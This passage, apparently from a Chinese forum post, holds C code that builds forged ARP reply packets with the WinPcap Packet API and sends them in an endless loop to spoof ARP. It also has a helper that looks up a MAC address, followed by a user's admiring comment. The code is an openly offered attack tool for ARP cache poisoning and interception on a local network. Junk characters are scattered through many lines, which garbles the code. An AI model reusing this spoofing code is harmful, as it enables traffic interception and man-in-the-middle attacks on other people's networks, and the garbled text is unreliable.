  memcpy(ArpPacket.arphdr.SourceMAC, g_szOwnMAC, 6);//sender's mac
  ArpPacket.arphdr.HrdAddrlen = 6;
  ArpPacket.arphdr.ProAddrLen = 4;
$ \0 x# K! I$ W: w% {1 c! c; `  ArpPacket.arphdr.HrdType = htons(ARP_HARDWARE);
0 h, c" n1 f7 d& V  y% W  ArpPacket.arphdr.ProType = htons(EPT_IP);
  ArpPacket.arphdr.op = htons(2);//arp reply
# X9 C1 X9 K2 ~
' x+ W$ z9 m6 Z  lpArpPacket = PacketAllocatePacket();
  if(lpArpPacket == NULL)
  {
    printf("Error:failed to allocate the LPPACKET structure for Arp spoof.\n");
( _8 [+ p' F" @; |8 o" J, G    return 0;
1 @8 |' _  h! l, U4 }  }
  memset(szArpBuff, 0, sizeof(szArpBuff));
  memcpy(szArpBuff, (char *)&amp;ArpPacket, sizeof(ARPPACKET));
  PacketInitPacket(lpArpPacket, szArpBuff, 60);
  //send arp packet
* U: a6 M: m! Y$ T7 h+ D  while(1)
  {
    if(PacketSendPacket(g_lpAdapter, lpArpPacket, TRUE) == FALSE)
    {
# ~+ x( x" q9 y. x9 _7 B5 B- M      printf("Error sending the arp spoof packets!\n");
      return 0;
    }
    Sleep(1000);
$ O8 V0 B6 }2 t  }
  return 0;
& q& q, a7 ?/ U2 m6 E}
) `+ T, H5 I& h" ~: {3 [
7 k/ x/ ^3 ~( l3 B8 P//
3 g* ?, f! k+ J2 x+ n! P: f3 |$ b//功能：输入IP取得对应的MAC地址
//
BOOL GetMACAddr(DWORD DestIP, char *pMAC)
{
  DWORD  dwRet;
  ULONG  ulLen = 6, pulMac[2];
  dwRet = SendARP(DestIP, 0, pulMac, &amp;ulLen);
  if(dwRet == NO_ERROR)
5 C# `# |# x& c  b) p# Q( p  {
8 A- G9 d  }  F: n0 R    memcpy(pMAC, pulMac, 6);
% X2 o2 ]- U0 s6 x( q' B% c# S: @+ M    return TRUE;
+ M4 I+ k& H- b/ O, X  }
  else return FALSE;
" ]6 _8 f7 Z  a- q& k}

wy617958197

大侠好厉害啊